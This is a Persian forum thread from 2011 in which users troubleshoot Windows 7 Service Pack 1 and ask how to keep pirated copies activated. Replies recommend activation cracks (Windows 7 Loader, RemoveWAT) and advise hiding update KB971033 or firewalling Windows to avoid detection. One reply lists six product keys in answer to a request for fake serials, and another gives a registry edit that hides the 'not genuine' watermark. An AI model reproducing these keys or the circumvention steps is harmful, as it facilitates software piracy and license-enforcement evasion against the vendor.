SP1 ویندوز رو از کرک خارج نمیکنه که کرک بخواد.

سلام دوستان
من سون سرویس پک 1 را امروز خریدم و نصب کردم
اما مشکوکم (چون زده 2009)
شما این عکسو ببینید
آیا این نسخه قدیمی هست ؟
یا خودشه ؟
البته رفتم قسمت اپدیتها نوشته که ویندوز شما اپدیت هست

همونطور که ویندوز XP سرویس پک 3 رو هم هنوز میزنه 2003؛ ویندوز 7 هم تاریخ عرضش عوض نمیشه. فایلهاش به روز میشن.
ویندوز شما SP1 هستش و اکتیوه. مشکلی نداره.

با سلام و عرض ادب
ايا ويندوز قانوي هم بايد اكتيو بشه؟
اگر جواب مثبته ميشه بگين چطوري؟
براي من از دوبي يك پك اوريجينال ويندوز 7 اوردن كه موقع نصب از من
سريال نامبر حك شده در پكش رو نخواست

و ايا در نصب تعداد دفعات اين ويندوز قانوني محدوديتي هست؟
ممنونم از راهنمايي شما

احتمالا ویندوزتون به صورت 30 روزه هستش که در Properties بخش Computer باید برید و سریال اصلی رو درحالیکه به اینترنت متصل هستید وارد کنید تا ویندوز رجیستر بشه.

شما هر چند بار که بخواین میتونید این ویندوز رو برای یک سیستم ثبت کنید. ولی فقط همزمان یک سیستم.

hassanminai
07-02-2011, 16:42
SP1 ویندوز رو از کرک خارج نمیکنه که کرک بخواد.

همونطور که ویندوز XP سرویس پک 3 رو هم هنوز میزنه 2003؛ ویندوز 7 هم تاریخ عرضش عوض نمیشه. فایلهاش به روز میشن.
ویندوز شما SP1 هستش و اکتیوه. مشکلی نداره.

احتمالا ویندوزتون به صورت 30 روزه هستش که در Properties بخش Computer باید برید و سریال اصلی رو درحالیکه به اینترنت متصل هستید وارد کنید تا ویندوز رجیستر بشه.

شما هر چند بار که بخواین میتونید این ویندوز رو برای یک سیستم ثبت کنید. ولی فقط همزمان یک سیستم.

اين پك اوريجينال بوده و داراي دو دي وي دي 32 و 64 بيتي است.البته من 32 بيتي رو نصب كردم و نشد

varians
07-02-2011, 23:05
سلام
آقا من اول کرک ویندوز سون رو Uninstall کردم بعد SP1 نصبیدم روش بعد دوباره با Windows.Loader.v1.9.6 کرکش کردم. تا اینجا که فکر می کنم درست انجام دادم. رو Computer هم راست کلیک کردم دیدم میگه ویندوز اکتیو شده و علامت آبی جنیون هم هستش.
اما...
هنوزم زیر دسک تاپ بالای ساعت اینو نوشته.

چرا ؟ یعنی ویندوزم اکتیو نیست ؟ اگه نیست چرا تو properties مای کامپیوتر میگه اکتیو شده و علامت جنیون هم هست ؟
اگه شده ، پس چرا اونو بالای ساعت مینویسه ؟
(لازم به توضیحه که : تا زمانی که sp1 رو نصب نکرده بودم این مشکل وجود نداشت بعد از نصب sp1 اینجوری شده.
از اساتید می خوام لطفا توضیح کامل بدن پلیز...
:10:

ebicross
08-02-2011, 08:32
اين پك اوريجينال بوده و داراي دو دي وي دي 32 و 64 بيتي است.البته من 32 بيتي رو نصب كردم و نشد
ویندوزها در هر شرایطی با هم برابرند. یعنی پک های اورجینال فقط بسته بندی خاصی دارند و مهم اون سریال هست که شما دارید. اگر ویندوزتون همون سریال رو خودش ثبت کرده پس این قابلیت رو توی DVDها قرار دادند ولی اگر نکرده شما خودتون باید این کار رو بکنید.
موفق باشید.

سلام
آقا من اول کرک ویندوز سون رو Uninstall کردم بعد SP1 نصبیدم روش بعد دوباره با Windows.Loader.v1.9.6 کرکش کردم. تا اینجا که فکر می کنم درست انجام دادم. رو Computer هم راست کلیک کردم دیدم میگه ویندوز اکتیو شده و علامت آبی جنیون هم هستش.
اما...
هنوزم زیر دسک تاپ بالای ساعت اینو نوشته.

چرا ؟ یعنی ویندوزم اکتیو نیست ؟ اگه نیست چرا تو properties مای کامپیوتر میگه اکتیو شده و علامت جنیون هم هست ؟
اگه شده ، پس چرا اونو بالای ساعت مینویسه ؟
(لازم به توضیحه که : تا زمانی که sp1 رو نصب نکرده بودم این مشکل وجود نداشت بعد از نصب sp1 اینجوری شده.
از اساتید می خوام لطفا توضیح کامل بدن پلیز...

سرویس پک RTM که نهایی هست Water Mark نداره. الان سیستم شما Water mark زده یا سرویس پکتون نسخه ی Beta و یا RC هستش و یا به خاطر حذف کرک و این مسائله.
اگر مطمئن هستید Build سرویس پک 7601.17514.101119.1850 هستش از ابزار زیر استفاده کنید:

یک نکته بگم دوستان برای نصب SP1 کرک رو حذف نکنید. SP1 اصلا به کرک کاری نداره.
و اینکه Windows 7 Loader درسته که کرک خوبیه ولی فایلهای مهمی رو دستکاری میکنه برای این کار.

varians
08-02-2011, 12:26
راستش من سرویس پک رو حدود 1ماه بیشتره از خود مایکروسافت دانلود کردم. مشخصاتش اینه :
حالا این چه ورژتیه ؟ اگه ورژن نهایی و Rtm نیست بگین اونو از کجا دانلود کنم ؟ (آخرین و نهایی ترین ورژن رو )
مرسی

tranceyou
08-02-2011, 15:11
سلام این سی دی جدید ویندوز 7 رو از سایت خریدم ولی توضیح دقیقی راجب 2 دیودی و اینکه دوتا
پوشه کرک توش هست و کدوم رو باید بزنیم چیزی ننوشتن میشه یه توضیحاتی راجب این سی دی
بدین ممنون.

iMan.xP
08-02-2011, 16:14
من هنگام استفاده از پوشه بک اپ یا سی دی ویندوز وینوزم از حالت اولیه که خودش موقع نصب کرک شده بوده خارج میشه و پیغام قلابی بودن میده تا حالا چند بار مجبور شدم ویندوز را از نوع فرمت و نصب کنم ایا راه حل یا نرم افزاری وجود داره که بعد از استفاده از بک اپ بتونم انرا ریجیستر و کرک کنم ؟

ebicross
08-02-2011, 16:27
حالا این چه ورژتیه ؟ اگه ورژن نهایی و Rtm نیست بگین اونو از کجا دانلود کنم ؟ (آخرین و نهایی ترین ورژن رو )
مرسی
بله متاسفانه این که دانلود کردید SP1 RC هستش.
لینکهای SoftPedia با همین RC جایگزین شده (معلوم نیست چرا) و لینکهای دیگه ای که داشتم حذف شده. به نظرم صبر کنید تا حدود 15 فوریه که خود مایکروسافت رسمی برای دانلود بزاره.

سلام این سی دی جدید ویندوز 7 رو از سایت خریدم ولی توضیح دقیقی راجب 2 دیودی و اینکه دوتا
پوشه کرک توش هست و کدوم رو باید بزنیم چیزی ننوشتن میشه یه توضیحاتی راجب این سی دی
بدین ممنون.

DVD اول نسخه ی 32 بیت (برای سیستمهایی با کمتر از 4 گیگابایت رم) و DVD دوم 64 بیت هستش.
کرک دوم رو اول تست کنید. اگر کرک شد و ویندوز Genuine و اکتیو شد که شده. اگر نشد اولی رو تست کنید.

varians
08-02-2011, 17:13
بله متاسفانه این که دانلود کردید SP1 RC هستش.
لینکهای SoftPedia با همین RC جایگزین شده (معلوم نیست چرا) و لینکهای دیگه ای که داشتم حذف شده. به نظرم صبر کنید تا حدود 15 فوریه که خود مایکروسافت رسمی برای دانلود بزاره.
پس تا یه هفته دیگه میاد دیگه انشالله ؟
میشه از خود مایکروسافت دانلود کرد ؟

ebicross
08-02-2011, 18:34
پس تا یه هفته دیگه میاد دیگه انشالله ؟
میشه از خود مایکروسافت دانلود کرد ؟
اومده ولی رسمی هنوز نیومده.
هفته ی دیگه رسما عرضه میشه (احتمالا همراه با IE9 RC:40:)
بله میشه دانلود کرد. رایگانه.

ali_z051
08-02-2011, 22:30
سلام

چندتا سوال داشتم..

1-وقتی ویندوز اپدیت میشه فایل های اپدیت کجا میرن ؟
2-امکانات سرویس پک 1 چی هست ؟
3-من سرویس پک 1 Rtm رو از سافت گذر خریدم. دوستان میگن 15 فوریه رسمآ از ماکروسافت عرضه میشه, با این تفاوتی داره ؟

ebicross
09-02-2011, 00:24
1-وقتی ویندوز اپدیت میشه فایل های اپدیت کجا میرن ؟
2-امکانات سرویس پک 1 چی هست ؟
3-من سرویس پک 1 Rtm رو از سافت گذر خریدم. دوستان میگن 15 فوریه رسمآ از ماکروسافت عرضه میشه, با این تفاوتی داره ؟
آپدیت ها در درایو ویندوز در پوشه ی SoftwareDistribution ذخیره میشن ولی با کپی کردن این پوشه بعدا قابل استفاده نیستند. نرم افزاری برای این کار هستش که البته توصیه نمیشه. (از طرف مایکروسافت)

امکانات سرویس پک علاوه بر آپدیتها تا تاریخ عرضه ی سرویس پک؛ استفاده ی بهینه از قدرت CPU در بعضی کارهای گرافیکی؛ افزوده شدن چند قابلیت در مورد شناسایی ابزارهای امنیتی و Encrypt هاست. رفع مشکل فایلهای XPS و یک سری چیزهای دیگه که جمعا 6 مورد میشه.

نه فرقی نداره. مگر اینکه خیلی خیلی بعید باشه که این سرویس پک اصلا رسمی نباشه ولی احتمالش نیم درصد هم نیست چون همه تایید کردند.

ila
09-02-2011, 14:35
آیا غیر از کرک راهی هم هست که بشه ویندوز سون رو اکیتو کرد؟
مثلا شماره سریال

ebicross
09-02-2011, 14:41
آیا غیر از کرک راهی هم هست که بشه ویندوز سون رو اکیتو کرد؟
مثلا شماره سریال

بله یکی اینکه سریال های تقلبی استفاده کنید که هیچ تضمینی نداره و یهو غیر فعال میشه و دانلود از مایکروسافت اگر بکنید متوجه میشه و راه دوم اینه که پول بدین و یک سریال ویندوز بخرید.

ila
09-02-2011, 15:22
اگه ویندوزت رو فعال نکنی یکی دو پنجره بعد از اینکه login شدی و وارد سیتمت شدی نمایش میده که بتید فعال منی و اینها..آیا راهی هست که این پنجره را نمایش نده هر بار که بالا میایی با سیستمت؟

ebicross
09-02-2011, 16:04
این پنجره ها اخطار هستند و بعد از اتمام مدت دیگه کلا دسترسی به سیستمتون قطع میشه.
نه راهی نداره اگر نه که دیگه کسی ویندوز رو کرک نمیکرد. :20:

بهنازی
10-02-2011, 00:12

۱-بهترین راه حل این است که در Control Panel > Windows Update در منوی سمت چپ برروی Change setting کلیک نمایید و گزینه Install update automatically (recommended) را برروی Check for updates but let me choose whether to Download and install them. تنظیم نمایید.این گزینه باعث می شود ویندوز برای دریافت و نصب آپدیتها از شما اجازه بگیرد و شما می توانید انتخاب نمایید کدام یک از آپدیتها را نصب نمایید و کدام یک را نصب ننمایید.

هر چند توصیه ما این است که این گزینه را به طور کل برروی Never check for updates تنظیم نمایید تا اصولا آپدیتهای ویندوز نصب نشود.

۲-بعد از اینکه ویندوز به سایت مایکروسافت متصل شد و لیست آپدیتها را به شما نشان داد تیک جلوی اپدیت شماره KB971033 را بردارید تا نصب نشود.

شما آدم خوش شانسی هستید ولی ممکن است تا یکی دوروز آینده اکتیویشن از کار بیفتد که در این صورت از روش مرحله بعد استفاده نمایید.

از کجا بذونیم که کدوم یکی از اتفاقات بالا برای وینذوز ما افتاده ؟
چیکار باید بکنم که پیغام
windows 7 build

---------- Post added at 12:12 AM ---------- Previous post was at 12:11 AM ----------

چیکار باید بکنم که پیغام
windows 7 build 7600 the copy of windows
حذف بشه؟

Mohammad King
10-02-2011, 14:29
چیکار باید بکنم که پیغام
windows 7 build

---------- Post added at 12:12 AM ---------- Previous post was at 12:11 AM ----------

چیکار باید بکنم که پیغام
windows 7 build 7600 the copy of windows
حذف بشه؟

سلام

اگر بیفته ویندوز شما ار اکتیو بودن خارج میشه و پیغامی مبنی بر the copy windows is not geniu میاد.

برای سوال دوم اینجا را بخونید:
#5 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

Subaru
10-02-2011, 14:51
من نه می تونم Unistall کنم و نه می تونم Install کنم
windows Loader را که باز می کنم هر دو گزینه Uninstall و Install غیر فعاله.

ebicross
10-02-2011, 17:41
من نه می تونم Unistall کنم و نه می تونم Install کنم
windows Loader را که باز می کنم هر دو گزینه Uninstall و Install غیر فعاله.

چون احتمالا از WAT Remover یا یک کرک دیگه قبلا استفاده کردید.

you_love_sky1
11-02-2011, 13:06
سلام.مشکل در نمایش تصاویر به صورت بند انگشتی دارم مشکل چیست؟

Mohammad King
11-02-2011, 13:54
سلام.مشکل در نمایش تصاویر به صورت بند انگشتی دارم مشکل چیست؟

سلام به این تاپیک ربطی نداره.

با توضیحات کامل یک تاپیک جدید ایجاد کنید

ila
11-02-2011, 18:03
من نمیخوام از کرک استفاده کنم...ولی میخوام 30 روزه استفاده نکنم و به طور کامل استفاده کنم از ویندوز 7.
نیازی هم به آپدیت کردن ندارم..چه جوری و چی کار کنم که بتونم ویندوزم رو کامل استفاده کنم؟
ممنون
منظورم کلا اینه اگه نخواهیم اپدیت کنیم ویندوز رو باز هم وقتی یه سماره سریالی چیزی مید متوجه میشه..کلا تنظیمیچیزی داره که با یه شماره سریال قلابی ویندوز اکتیو کنی ولی نفهمه و به اینترنت نذاریم وصل بشه ویندوزمون که غیراکتیو بشه؟
ممنون

ebicross
11-02-2011, 23:03
من نمیخوام از کرک استفاده کنم...ولی میخوام 30 روزه استفاده نکنم و به طور کامل استفاده کنم از ویندوز 7.
نیازی هم به آپدیت کردن ندارم..چه جوری و چی کار کنم که بتونم ویندوزم رو کامل استفاده کنم؟
ممنون
منظورم کلا اینه اگه نخواهیم اپدیت کنیم ویندوز رو باز هم وقتی یه سماره سریالی چیزی مید متوجه میشه..کلا تنظیمیچیزی داره که با یه شماره سریال قلابی ویندوز اکتیو کنی ولی نفهمه و به اینترنت نذاریم وصل بشه ویندوزمون که غیراکتیو بشه؟
ممنون

فکر میکنم از طریق یک Firewall میتونید دسترسی سیستم (بخش مربوطه در ویندوز) رو به اینترنت قطع کنید و از یک سریال تقلبی استفاده کنید. (مطمئن نیستم)
البته از آپدیت، نصب نرم افزارهایی که نیاز به Geniune دارند و دانلود از سایت مایکروسافت محروم میشید.
ولی کرک های فعلی هم هیچ مشکلی ندارند. بهتره که کرک کنید یا یک سریال بخرید که هزینه کردن برای خریدن ویندوز در ایران لزومی نداره.

ila
12-02-2011, 00:16
فکر میکنم از طریق یک Firewall میتونید دسترسی سیستم (بخش مربوطه در ویندوز) رو به اینترنت قطع کنید و از یک سریال تقلبی استفاده کنید. (مطمئن نیستم)
البته از آپدیت، نصب نرم افزارهایی که نیاز به Geniune دارند و دانلود از سایت مایکروسافت محروم میشید.
ولی کرک های فعلی هم هیچ مشکلی ندارند. بهتره که کرک کنید یا یک سریال بخرید که هزینه کردن برای خریدن ویندوز در ایران لزومی نداره.

دیقیقا چه جوری..ایرادی نداره خیلی برام آپدیت مهم نیست
فقط همین انتی ویروسم آپدیت بشه کافیه
آخه با کرک که وصل میکنم سیستم یه خورده کندمیشه مخصوصا وقتی یاهومسنجر رو چندین بار باز میکنم یعنی با چندین ای دی انلاین میشم...اینه که خیلی از کرک خوشم نمیاد

varians
12-02-2011, 13:43
دیقیقا چه جوری..ایرادی نداره خیلی برام آپدیت مهم نیست
فقط همین انتی ویروسم آپدیت بشه کافیه
آخه با کرک که وصل میکنم سیستم یه خورده کندمیشه مخصوصا وقتی یاهومسنجر رو چندین بار باز میکنم یعنی با چندین ای دی انلاین میشم...اینه که خیلی از کرک خوشم نمیاد
منم همینطور
کرک رو کارکرد ویندوز اثر منفی میزاره. حداقل برا من که اینجوری بوده
مخصوصا رو هاییبرنیت و اسلیپ و ...
خلاصه اینکه خوشم نمیاد
اگه یه راهی باشه که بتونیم با سریال از شر 30 روزه بودن و اخطار های ویندوز خلاص شیم خیلی خوب میشه
ممنون میشیم یادمون بدین...
آپدیت ویندوز و اینا مهم نیست
:40:

abbas.133
12-02-2011, 13:45
باتشکرازسایتتون.تونستم باراهنماییهاتون ویندوزمو جنیون کنم:13:

maziarb
12-02-2011, 16:24
Windows 7 Loader 1.9.6

Version 1.9.6
* Added a new GRLDR version
* Added Aquarius, Hannspree, Hyrican, Lanix, Semp Toshiba, Twinhead & Synnex SLIC's
* Added Exper, Fujitsu and Hannspree Starter serials
* Added Dealin, Founder and Fujitsu Home Basic serials
* Added Gigabyte and Shuttle Home Premium serials
* Added Dealin and Mercer Professional serials
* Added Fujitsu Ultimate serial
* Added HP serials for UltimateE, ProfessionalE, HomePremiumE & StarterE
* Other minor tweaks and fixes

Version 1.9.5
* Added a new GRLDR version which fixes a bug that prevented activation on systems with an XSDT

Download : Windows 7 Loader 1.9.6

ushuaia
19-02-2011, 21:43
سلام .من می خواستم بدونم فرق بین ویندوز 7 التیمت و نسخه اینتر پرس در چیست و استاد من امروز نسخه 64 بیتی اینترپرس نصب کرده ام .کرک و لودر برای اکتیو کردن این نسخه می خواستم ..............

iMan.xP
19-02-2011, 23:56
سلام .من می خواستم بدونم فرق بین ویندوز 7 التیمت و نسخه اینتر پرس در چیست و استاد من امروز نسخه 64 بیتی اینترپرس نصب کرده ام .کرک و لودر برای اکتیو کردن این نسخه می خواستم ..............
سلام ویندوز التیمت همه چی داره ولی اینترپرس یه سری از نرم افزارهای التیمت از توش حذف شده کاملترین ویندوز التمیت است و بهتره اون رو نصب کنید در ضمن ادرس فایل کرک رو در زیر گذاشتم

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 20([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]).zip ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 20([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]).zip)

پسوردشم اینه : [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

Subaru
20-02-2011, 20:30
چون احتمالا از WAT Remover یا یک کرک دیگه قبلا استفاده کردید.

خب چاره کار چیه؟
چکار کنم تا مشکل حل شه ؟

iCe m@n
21-02-2011, 01:20
سلام دوستان
جدید ترین ورژن کرک برای ویندوز 7ultimate 64bit چند هست
میشه لینکش رو بذارید

ممنون:11:

ebicross
21-02-2011, 09:18
خب چاره کار چیه؟
چکار کنم تا مشکل حل شه ؟
اگر ویندوزتون در قسمت Geniune توی Properties قسمت My Computer چیزی نشون نمیده که یعنی ویندوز مشکل نداره و اکتیوه. اما اگر داره مهلتش تمام میشه بهتره از همون WAT Remover دوباره استفاده کنید.

فرقشون فقط در لیسانسی هست که مایکروسافت براشون در نظر گرفته و نسخه ی Enterprise در حقیقت Ultimate Enterprise هستش و Enterprise خالی نیست. تفاوت Enterprise با معمولی اینه که Enterprise برای شرکتهای تجاری لایسنس شده.

کرکش در یک پست بالاتر از مطلبتون هست.

سلام دوستان
جدید ترین ورژن کرک برای ویندوز 7ultimate 64bit چند هست
میشه لینکش رو بذارید

ممنون:11:
همین لینک که برای دوستمون گذاشتم برای شما هم جواب میده.

ila
21-02-2011, 15:07
شماره سریال تقلبی کی داره؟ برای ویندوز 7 سرویس پک 1؟

edi2
21-02-2011, 19:49
Windows 7 Loader 1.9.6

Version 1.9.6
* Added a new GRLDR version
* Added Aquarius, Hannspree, Hyrican, Lanix, Semp Toshiba, Twinhead & Synnex SLIC's
* Added Exper, Fujitsu and Hannspree Starter serials
* Added Dealin, Founder and Fujitsu Home Basic serials
* Added Gigabyte and Shuttle Home Premium serials
* Added Dealin and Mercer Professional serials
* Added Fujitsu Ultimate serial
* Added HP serials for UltimateE, ProfessionalE, HomePremiumE & StarterE
* Other minor tweaks and fixes

Version 1.9.5
* Added a new GRLDR version which fixes a bug that prevented activation on systems with an XSDT

Download : Windows 7 Loader 1.9.6

دوستان بعد از اپدیت امروز جنیوننش از دست رفته و چه جوری باید با این کرک کار کنم؟

Mohammad King
21-02-2011, 21:17
شماره سریال تقلبی کی داره؟ برای ویندوز 7 سرویس پک 1؟

QXV7B-K78W2-QGPR6-9FWH9-KGMM7
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
6JKV2-QPB8H-RQ893-FW7TM-PBJ73
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY
JYDV8-H8VXG-74RPT-6BJPB-X42V4

دوستان بعد از اپدیت امروز جنیوننش از دست رفته و چه جوری باید با این کرک کار کنم؟

سلام

توضیحات در پست اول

edi2
21-02-2011, 23:03
دوستان این کرک ها کار نمیکنه من چی کار کنم؟

Dew Drop
22-02-2011, 00:55
دوستان این کرک ها کار نمیکنه من چی کار کنم؟

تو بیشتر موارد Remove wat جواب میده,یه بار هم این رو تستش کنید.

aramus
22-02-2011, 15:13
سلام دوستان من ویندوزم رو عوض کردم حالا میخوام اپدیت کنم

ولی هر چی تو لیست اپدیت میگردم این اپدیت kb971033 رو پیدا نمیکنم که بخوام هاید کنم
تو هیچ کدوم از لستها نیست نه تو important و optional
تو اپدین شده ها هم نگاه کردم ببینم اپدیت نشده باشه ولی اونجا هم نبود
تو قسمت هاید شده ها هم دیدم بازم نبود

حالا چه کنم ؟

Lord Milad
22-02-2011, 16:49
سلام خدمت دوستان...

من به کمک راهنمایی شما تونستم بعد از کلی کلنجار رفتن ویندوز رو اکتیو کنم.

ولی یه مشکلی هست اینه که من تو یه تایپک دیدم که میشه ویندوز سون رو با دانلود یک پک که سرویس پک 1 سون بود دانلود کرد و آپدیت آذیت نکنه.منم دانلودش کردم که انگار لینکش از خوده ماکروسافته ولی رو 47% دیگه دانلود نمیکنه.علتش چیه؟
چون حجمش زیاد بود میگما چون 520 مگ هست و نصفش دانلود کرده.چیکار میتنم کنم.؟

لطفا کمک کنید

iCe m@n
22-02-2011, 17:03
دانلود کرک جدید برای ویندوز ۷ با Windows 7 Loader v1.9.7

پسوورد:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدموفق باشید:11:

ila
22-02-2011, 22:47
QXV7B-K78W2-QGPR6-9FWH9-KGMM7
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
6JKV2-QPB8H-RQ893-FW7TM-PBJ73
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY
JYDV8-H8VXG-74RPT-6BJPB-X42V4

سلام

توضیحات در پست اول

بعد اگه من این شماره سریال ها رو وارد کنم ویندوز اکتیو میشه و اگه جلوی آپدیت رو بگیرم؟

ebicross
22-02-2011, 22:55
بعد اگه من این شماره سریال ها رو وارد کنم ویندوز اکتیو میشه و اگه جلوی آپدیت رو بگیرم؟
بله اکتیو میشه ولی دقیقا مثل لایسنس آنتی ویروسها بعد از یک مدت شناسایی میشه و غیر فعال میشه مگر اینکه خیلی خوش شانس باشید.

tasnim68
23-02-2011, 11:15
سلام؛
من وقتی ویندوز سون رو نصب کردم خودش اتوماتیک کرکش رو هم نصب کرد، این شد که بدون مشکل ازش استفاده می کردم، تا اینکه امروز آپدیت SP1 رو دانلود کردم و ویندوزم به SP1 ارتقا پیدا کرد ولی کرک رو شناسایی کرد و الآن ویندوزم فعالسازی می خواد.
کرک هایی که تو پست اول و این تاپیک گذاشتید هیچ کدوم فکر نکنم رو سرویس پک 1 جواب بدن. جواب می دن!؟
اگه ممکنه راهنمایی کنید.

ebicross
23-02-2011, 12:38
سلام؛
من وقتی ویندوز سون رو نصب کردم خودش اتوماتیک کرکش رو هم نصب کرد، این شد که بدون مشکل ازش استفاده می کردم، تا اینکه امروز آپدیت SP1 رو دانلود کردم و ویندوزم به SP1 ارتقا پیدا کرد ولی کرک رو شناسایی کرد و الآن ویندوزم فعالسازی می خواد.
کرک هایی که تو پست اول و این تاپیک گذاشتید هیچ کدوم فکر نکنم رو سرویس پک 1 جواب بدن. جواب می دن!؟
اگه ممکنه راهنمایی کنید.
ویندوز من هم به همین صورت کرک شده ولی با نصب سرویس پک مشکلی براش پیش نیومد. چون آپدیت WAT جز آپدیتهای همراه با سرویس پک نیست. حالا نمیدونم چرا برای شما مشکل پیش اومده.

کرک های پست اول هم روی SP1 جواب میدن. اما بهتره شما Wat Remover نصب کنید.

tasnim68
23-02-2011, 13:35
ویندوز من هم به همین صورت کرک شده ولی با نصب سرویس پک مشکلی براش پیش نیومد. چون آپدیت WAT جز آپدیتهای همراه با سرویس پک نیست. حالا نمیدونم چرا برای شما مشکل پیش اومده.

کرک های پست اول هم روی SP1 جواب میدن. اما بهتره شما Wat Remover نصب کنید.
آقا واقعا ممنون. Wat Remover رو استفاده کردم، فعلا که مشکلی نیست. حالا یه سوال؛ اگه دوباره ویندوز رو آپدیت کنم ممکنه باز اونطوری بشه یا نه!؟

ebicross
23-02-2011, 15:48
آقا واقعا ممنون. Wat Remover رو استفاده کردم، فعلا که مشکلی نیست. حالا یه سوال؛ اگه دوباره ویندوز رو آپدیت کنم ممکنه باز اونطوری بشه یا نه!؟
نه دیگه اینطور نمیشه.
بدون مشکل ویندوزتون رو به روز نگه دارید.

roteal2007
23-02-2011, 16:24
سلام دوستان در پست 8 آموزشی هست که آیکون لپ تاپ رو توی my computer به صورت ریجستر شده میاره میشه برای آخرین کرک آپدیت بشه؟

ebicross
23-02-2011, 18:43
سلام دوستان در پست 8 آموزشی هست که آیکون لپ تاپ رو توی my computer به صورت ریجستر شده میاره میشه برای آخرین کرک آپدیت بشه؟
بله مشکلی نیست که شما از کرک های جدید استفاده کنید و فقط از همین بخش تغییر لوگو استفاده کنید و بعد کرک رو ببندید. جواب میده.

digitalrn
23-02-2011, 19:27
سلام ببخشید اگه جاش مناسب نیست
راستش من دوتاویندور دارم
یکی اکس پی که رو دراوی C هست یکی سون که رو درایو E هست .
حالا میخوام فقط سون داشته باشم ولی اطلاعات درایو E برام مهمه نمیتونم فرمت کنم و هارد دیگه جا نداره تا انتقالشون بدم
از طریق ویندوز اکس پی هم میخوام فایل های سون رو پاک کنم نمیشه و خطای access denied میده !

حالا موندم چی کار کنم ؟

ebicross
23-02-2011, 21:28
سلام ببخشید اگه جاش مناسب نیست
راستش من دوتاویندور دارم
یکی اکس پی که رو دراوی C هست یکی سون که رو درایو E هست .
حالا میخوام فقط سون داشته باشم ولی اطلاعات درایو E برام مهمه نمیتونم فرمت کنم و هارد دیگه جا نداره تا انتقالشون بدم
از طریق ویندوز اکس پی هم میخوام فایل های سون رو پاک کنم نمیشه و خطای access denied میده !

حالا موندم چی کار کنم ؟

سوالتون توی تاپیکی که ایجاد کردید جواب داده شد.

بحث رو اونجا ادامه بدین.

IntelCentrino
24-02-2011, 10:39
سلام
این مسیر رو تو رجیستری برید

HKEY_CURRENT_USER\Control Panel\Desktop

رو کلید desktop کلیک کنید تو صفحه راست کلید PaintDesktopVersion
رو پیدا کنید و بازش کنید.تو قسمت valu date بنویسید 0 و ok کنید.

اگه این روش جواب نداد از این استفاده کنید.

windows 7 sp1 watermark remover

من از هر دو روش استفاده کردم اما جواب نداد.

ramin_rp
24-02-2011, 15:03
سلام
با نصب sp1 کرک ویندوز خراب شد و با removewat هم درست نشد

IntelCentrino
24-02-2011, 15:11
سلام
با نصب sp1 کرک ویندوز خراب شد و با removewat هم درست نشد

اتفاقا امروز منهم این مشکل را داشتم.
اگر قبلا با removewat ویندوز را کرک کرده باشید، مشکلی نخواهید داشت. کافی است ابتدا removewat را اجرا کنید و ابتدا کرک قبلی را uncrack کنید و سیستم را ریست کنید و مجددا با removewat ویندوز را کرک کنید.

j_m2009
25-02-2011, 08:17
اتفاقا امروز منهم این مشکل را داشتم.
اگر قبلا با removewat ویندوز را کرک کرده باشید، مشکلی نخواهید داشت. کافی است ابتدا removewat را اجرا کنید و ابتدا کرک قبلی را uncrack کنید و سیستم را ریست کنید و مجددا با removewat ویندوز را کرک کنید.
من قبلاً با RemoveWat 2252 ویندوز رو کرک کرده بودم. امروز که آپدیت SP1 رو دانلود و نصب کردم، شناساییش کرد. من هم همین کار رو که شما میگی انجام دادم ولی ظاهرا درست نشده؛ البته وقتی ویندوز بالا میاد نمیگه که جنیون نیست و صفحه هم سیاه نمیشه ولی در گوشه ی سمت راست و پایین تصویر این عبارت لعنتی رو نوشته:
This Copy of windows is not genuine
ضمنا دو کلمه بالای این عبارت هم بود که با نصب windows 7 sp1 watermark remover که در یکی دو پست قبل معرفی کرده بودید، اون دو کلمه از بین رفت.

ebicross
25-02-2011, 10:41
من قبلاً با RemoveWat 2252 ویندوز رو کرک کرده بودم. امروز که آپدیت SP1 رو دانلود و نصب کردم، شناساییش کرد. من هم همین کار رو که شما میگی انجام دادم ولی ظاهرا درست نشده؛ البته وقتی ویندوز بالا میاد نمیگه که جنیون نیست و صفحه هم سیاه نمیشه ولی در گوشه ی سمت راست و پایین تصویر این عبارت لعنتی رو نوشته:
This Copy of windows is not genuine
ضمنا دو کلمه بالای این عبارت هم بود که با نصب windows 7 sp1 watermark remover که در یکی دو پست قبل معرفی کرده بودید، اون دو کلمه از بین رفت.
در Properties بخش My Computer درباره ی Geniune چی نوشته؟
مهلت 30 روزه داده یا زده اکتیوه و یا هیچی نوشته نشده؟

j_m2009
25-02-2011, 13:04
در Properties بخش My Computer درباره ی Geniune چی نوشته؟
مهلت 30 روزه داده یا زده اکتیوه و یا هیچی نوشته نشده؟
هیچی ننوشته ولی سوالم اینه که اگه کرک شده، چرا نوشته ی روی دسک تاپ از بین نمیره؟

ebicross
25-02-2011, 13:09
هیچی ننوشته ولی سوالم اینه که اگه کرک شده، چرا نوشته ی روی دسک تاپ از بین نمیره؟
اگر هیچی ننوشته با Remove WAT کرک شده.
کرک رو حذف کنید و دوباره نصب کنید تا اون نوشته حذف بشه.

احتمالا هم ویندوزتون کرک نیست ولی Remove WAT اون بخش رو از بین برده.
به هر حال مراقب باشید که اگر کرک نباشه ویندوزتون رو از دست ندین.

بهتره از یک کرک دیگه هم استفاده کنید. البته بعد از حذف این یکی.

j_m2009
25-02-2011, 14:03
اگر هیچی ننوشته با Remove WAT کرک شده.
کرک رو حذف کنید و دوباره نصب کنید تا اون نوشته حذف بشه.

احتمالا هم ویندوزتون کرک نیست ولی Remove WAT اون بخش رو از بین برده.
به هر حال مراقب باشید که اگر کرک نباشه ویندوزتون رو از دست ندین.

بهتره از یک کرک دیگه هم استفاده کنید. البته بعد از حذف این یکی.
